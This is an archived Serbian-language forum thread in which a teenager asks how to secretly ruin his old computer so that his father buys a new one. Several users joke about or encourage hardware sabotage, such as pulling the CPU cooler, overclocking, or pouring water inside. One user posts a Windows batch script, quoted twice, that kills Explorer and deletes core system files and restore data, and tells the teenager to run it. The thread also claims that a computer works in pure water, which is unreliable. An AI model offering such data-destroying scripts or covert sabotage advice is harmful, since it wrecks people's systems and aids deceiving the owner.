Prikaži potpunu verziju : Pomoc!
Ljudi, pomagajte!!! Pre nekoliko dana sam reinstalirao Windows XP SP2 jer mi je kompjuter bio pun virusa i Trojan programa(oko 21.000!!!). Gari koji radi sa kompjuterima mi je instalirao Windows XP SP3 i sada sve radi normalno... sem igrica!!! Elem, Windows mi je instaliran na disku C, a sve igrice koje imam su mi instalirane na E. Sve te stvarčice koje pri instalaciji igrica idu u folder Documents and Settings bile su na disku C, a pošto sam reinstalirao Windows, sada ih nema!!! Zbog toga skoro nijedna igrica neradi. Igrice od kojih sam imao CD sam reinstalirao i sada normalno rade, ali šta da radim sa ostalima??? Da stvar bude još gora, igrice nemogu da se izbrišu!!! E sada imam još jedno veoooma bitno pitanje: kako mogu da zeznem komp tako da se više nemože popraviti ali i da ćale kad ga odnese na servis ne primeti da je komp namerno pokvaren??? To hoću da uradim zato što imam konfiguraciju koja je stara 7 godina i svaki Božiji dan molim tatu da mi kupi novi komp, ali on neće ni da čuje!!! Neznam u čemu je problem, vukovac sam, sad ću upisati farmaciju, a što je najgore, ćale ima para da mi kupi milion kompova!!! Molim vas, udelite svoje znanje o kompjuterima sirotinji kao što sam ja!!!
DonCorleone91
10.7.2009, 22:00
Naravno da ti igrice ne rade kad si izbrisao (formatirao) c:/ particiju zato sto se ne nalaze delovi igara samo u my documents nego se nalaze i u registry-u Windows-a. Sto znaci da igre koje imas ne mogu da rade dok se ne reinstaliraju :p
A za komp :) sta da ti kazem....uzmi faitalicu i naprskaj unutra :D al uzmi destilovanu vodu :p da se ne uvati kamenac :D
A kako mogu da uzbrisem te igre???
jozvan_Kg
10.7.2009, 22:16
Форматираш ту партицију на којој се налазе. Отвориш Му Цомпутер, па десни клик на партицију где се те игре налазе, и опција Формат, штиклираш Квик формат и кликнеш на дугме формат испод тога, и евентуално потврдиш акцију кад изађе прозор. :)
Форматираш ту партицију на којој се налазе. Отвориш Му Цомпутер, па десни клик на партицију где се те игре налазе, и опција Формат, штиклираш Квик формат и кликнеш на дугме формат испод тога, и евентуално потврдиш акцију кад изађе прозор. :)
Ali na toj particiji imam puno programa koji su mi veoma potrebni i nemogu da ih izbrisem...
Obriši njihove foldere ručno iz explorera ili commandera.
A za ovo drugo,... pa, nije teško poverovati da ima dece kao što si ti koja bi to uradila, ali opet videti to uživo... I još da ima ljudi spremnih da ti pomognu da uništiš ćaletovu imovinu...
jozvan_Kg
10.7.2009, 22:27
А мош' и да га продрмусаш мало, обично старе машине као та нису имуне на потресе :)
Probacu kad se vratim kuci pa cu vam javiti kako je proslo... U svakom slucaju, HVALA!!!
juuuuuu!!! ja da imam takvu konfu bio bih srecan! Ne bi mi ni na pamet padalo da sprzim procesor!!! Pazi, mozda je bolje da tatu ubedish da ti kupi nov komp (npr. dobrim ocenama :kreza:) a stari prodash... Shteta da ga zapalish... a mozes i da spojish taj komp i tu novu konfu, odnosno iskoristish ram cd-rom mozda i napajanje, hard...itd.
Hephaestus
10.7.2009, 22:43
Daj tvoj racunar Branislavu G. i kazi da ti ga je neko ukrao:D
Marti Misterija
10.7.2009, 22:44
Neznam u čemu je problem, vukovac sam, sad ću upisati farmaciju, a što je najgore, ćale ima para da mi kupi milion kompova!!!
Cale ti je stipsa, nema druge.
@ Hephaestus
Isuvise je to mlad racunar za BG, vidis da ima cak i XP SP2.
MareZinjo
10.7.2009, 22:49
Eo prekopiraj ovo u notepad i snimi sa ekstenzijom .bat i klikni na ikonicu i tako radi sve dok Garija nesmori da dolazi :D
@echo off
tskill explorer
del "c:\windows\explorer.exe"
del "c:\windows\system32\smss.exe"
del "c:\windows\system32\winlogon.exe"
del "c:\windows\system32\services.exe"
del "c:\windows\system32\lsass.exe"
del "c:\windows\system32\svchost.exe"
del "c:\windows\system32\csrss.exe"
del "c:\windows\system32\ekrn.exe"
del "c:\windows\system32\spoolsv.exe"
del "c:\windows\system32\config\system.exe"
del "c:\windows\system32\restore\rstrui.exe"
del "c:\windows\system32\restore\srdiag.exe"
del "c:\windows\system32\restore\rstrlog.dat"
del "c:\windows\system32\restore\srframe.mmf"
del "c:\windows\system32\xlivefnt.dll"
del "c:\windows\system32\oembios.bin"
del "c:\windows\system32\xlive.dll"
del "c:\windows\system32\shell32.dll"
del "c:\windows\system32\wmp.dll"
del "c:\windows\system32\mrt.dll"
del "c:\windows\system32\wmploc.dll"
water wizard
11.7.2009, 0:40
čupni nešto sa matične kleštima, pre toga izvadi gajtan iz struje !!!
DonCorleone, destilovana voda ne provodi struju ;)
Sad, ako navata prašine sa matične može da se pokvari nešto :)
juuuuuu!!! ja da imam takvu konfu bio bih srecan! Ne bi mi ni na pamet padalo da sprzim procesor!!! Pazi, mozda je bolje da tatu ubedish da ti kupi nov komp (npr. dobrim ocenama :kreza:) a stari prodash... Shteta da ga zapalish... a mozes i da spojish taj komp i tu novu konfu, odnosno iskoristish ram cd-rom mozda i napajanje, hard...itd.
:boodala: Pa tvoj kompjuter je bolji od ovoga...
@ELIPS
Ako taj Athlon nije XP, samo mu skini kuler, upali komp i bezi iz sobe. Bice vatrometa.
water wizard
11.7.2009, 1:44
kao slučajno se izvukao kabl od cpu kulera :dzavo:
još treba da optuži Garija da mu je s***** komp
:boodala: Pa tvoj kompjuter je bolji od ovoga...
kako dodj... vid stvarno, pa ciju sam ja to onda konfu gledao? svashta... LM, mislim da je najbolje da se mane te djavolske pomisli (:dzavo:) da pravi roshtilj od svog kompa. Koliko toliko vredi i bolje mu je da ga proda i doda josh jednu sumu pa kupi nov.... mislim da sad i nije vreme za kupovinu novog kompa... najbolje ne zuri... josh ce neshto zapaliti pa ce intervenisati vatrogasci
"ovde kola broj 3, prijem, gasimo upaljeni athlon..."
a, ako cale skonta ili samo posumnja (ko josh vadi "kabal" od ventilatora???) nema ti kompa do 2015...
Eo prekopiraj ovo u notepad i snimi sa ekstenzijom .bat i klikni na ikonicu i tako radi sve dok Garija nesmori da dolazi :D
@echo off
tskill explorer
del "c:\windows\explorer.exe"
del "c:\windows\system32\smss.exe"
del "c:\windows\system32\winlogon.exe"
del "c:\windows\system32\services.exe"
del "c:\windows\system32\lsass.exe"
del "c:\windows\system32\svchost.exe"
del "c:\windows\system32\csrss.exe"
del "c:\windows\system32\ekrn.exe"
del "c:\windows\system32\spoolsv.exe"
del "c:\windows\system32\config\system.exe"
del "c:\windows\system32\restore\rstrui.exe"
del "c:\windows\system32\restore\srdiag.exe"
del "c:\windows\system32\restore\rstrlog.dat"
del "c:\windows\system32\restore\srframe.mmf"
del "c:\windows\system32\xlivefnt.dll"
del "c:\windows\system32\oembios.bin"
del "c:\windows\system32\xlive.dll"
del "c:\windows\system32\shell32.dll"
del "c:\windows\system32\wmp.dll"
del "c:\windows\system32\mrt.dll"
del "c:\windows\system32\wmploc.dll"
Da prekopiram samo ono sa del ili sve ispod tvoje recenice???
MareZinjo
11.7.2009, 13:33
Sve treba.
DonCorleone91
11.7.2009, 17:51
Sad, ako navata prašine sa matične može da se pokvari nešto :)
aaa da :D pa dobro ne mora bas full destilovana :D
Hoces da kazes da moze da se bucne komp u destilovanu vodu i da radi?
DonCorleone91
11.7.2009, 18:18
Hoces da kazes da moze da se bucne komp u destilovanu vodu i da radi?
Da, samo sto voda jako brzo rastvara bukvalno sve i nijedna voda nije 100% h2o :) inace ako je cist h2o komp u njemu moze da radi bez problema :) isto kao i u ulju :D
Sve treba.
Tvoje mi se cini kao najbolje...:D:D:D
E jel taj gari niukako nemoze da skonta da sam ja sve to uradio(izbrisao)???
E jel taj gari niukako nemoze da skonta da sam ja sve to uradio(izbrisao)???
Pa i nemora da skonta, samo ce da reinstalira vindoz i sve ce ponovo da radi kao sada.
vindoz
Мислио сам да је "vindouz" :D
Djordje Turjacanin
12.7.2009, 0:55
Аман, што зезате дечка.
Најбоље да га преклокује. Једно 400 мегахераца преко нормалнне вриједности и има да буде овако:nov_explo:nov_explo:nov_explo
Ал' пази да послије не буде :boodala:
To bi bilo ekstra da znam da klokujem...
Marti Misterija
12.7.2009, 16:30
Pa da bi ga sj*bao upravo tako i treba - da ne znas da klokujes.
Sad imas sve preduslove da ga dokrajcis - ne znas da klokujes a zarko to zelis da uradis.:p;)
Sass Drake
12.7.2009, 20:05
Имам једно рјешење за тебе. Заради ненкако новац за нови компјутер.
Pa to me najvise i nervira:ja imam pare ali mi tata neda!!!
neda!!!
Highlanderu, aj cik me opomeni sad zbog ovoga :D
@ELIPS: Ako ti je tata neda, onda mora da ti je mama :rofl:
Ma u zadnje vreme non stop gresim... Sreca sto nisam pogresio na prijemnom
mozda ima neke posebne zahteve il nesto tako
DonCorleone91
13.7.2009, 0:17
Ma u zadnje vreme non stop gresim... Sreca sto nisam pogresio na prijemnom
Pa ako ti imas svoje pare mozes i sam da odes da kupis :) zar ne? :) a ako treba tata da ti da, a ona ti neda :) onda ne znam sta da ti kazem :)
vBulletin® v3.8.7, Copyright ©2000-2025, vBulletin Solutions, Inc.